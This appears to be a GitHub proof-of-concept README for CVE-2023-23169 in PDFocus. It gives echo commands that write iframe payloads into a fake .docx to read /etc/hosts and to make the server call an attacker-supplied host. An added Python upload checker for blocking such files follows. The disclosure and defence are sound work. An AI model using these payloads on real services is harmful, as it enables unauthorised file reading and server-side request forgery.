S4nshine / CVE-2023-23169


CVE-2023-23169

POC for CVE-2023-23169: Local File Inclusion & Server-Side Request Forgery

Steps to reproduce:

Local File Inclusion:

  1. echo "<iframe src=file://etc/hosts></iframe>" > poc.docx
  2. Upload the file to PDFocus services
  3. View/Download the file afterwards to trigger the POC

SSRF:

  1. echo "<iframe src=http://your-server></iframe>" > poc.docx
  2. Upload the file to PDFocus services
  3. View/Download the file to see the triggered POC
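
Both procedures above rely on an HTML fragment being accepted under a .docx name and then rendered by the converter. The following pre-conversion upload check is an added example, not code from this repository or from the vendor; the function names and the policy (reject any upload that is not a genuine OOXML container and references a loadable URL) are assumptions.

```python
import io
import zipfile
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed samples: the two files the PoC steps above create with echo.
LFI_SAMPLE = b"<iframe src=file://etc/hosts></iframe>\n"
SSRF_SAMPLE = b"<iframe src=http://your-server></iframe>\n"

OOXML_EXTS = (".docx", ".xlsx", ".pptx")
FETCH_ATTRS = {"src", "href", "data", "action", "poster"}  # attributes a renderer may load


class FetchFinder(HTMLParser):
    """Records every URL an HTML renderer would try to load."""

    def __init__(self):
        super().__init__()
        self.hits = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            url = (value or "").strip()
            # Fragment-only links load nothing; everything else is reported.
            if name in FETCH_ATTRS and url and not url.startswith("#"):
                scheme = urlparse(url).scheme.lower() or "relative"
                self.hits.append(f"<{tag}> loads {scheme} URL {url}")


def is_real_ooxml(data):
    """A genuine .docx starts with a ZIP local header and holds [Content_Types].xml."""
    if data[:4] != b"PK\x03\x04":  # also rejects HTML-prefixed ZIP polyglots
        return False
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            return "[Content_Types].xml" in zf.namelist()
    except zipfile.BadZipFile:
        return False


def check_upload(filename, data):
    """Return (accepted, reasons) for one upload, before it reaches the converter."""
    if is_real_ooxml(data):
        return True, []
    reasons = []
    if filename.lower().endswith(OOXML_EXTS):
        reasons.append("extension claims OOXML but content is not an OOXML container")
    finder = FetchFinder()
    finder.feed(data.decode("utf-8", errors="replace"))
    finder.close()
    return not (reasons + finder.hits), reasons + finder.hits
```

This check only filters input; the converter's rendering step should still run without access to local files or outbound network connections.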
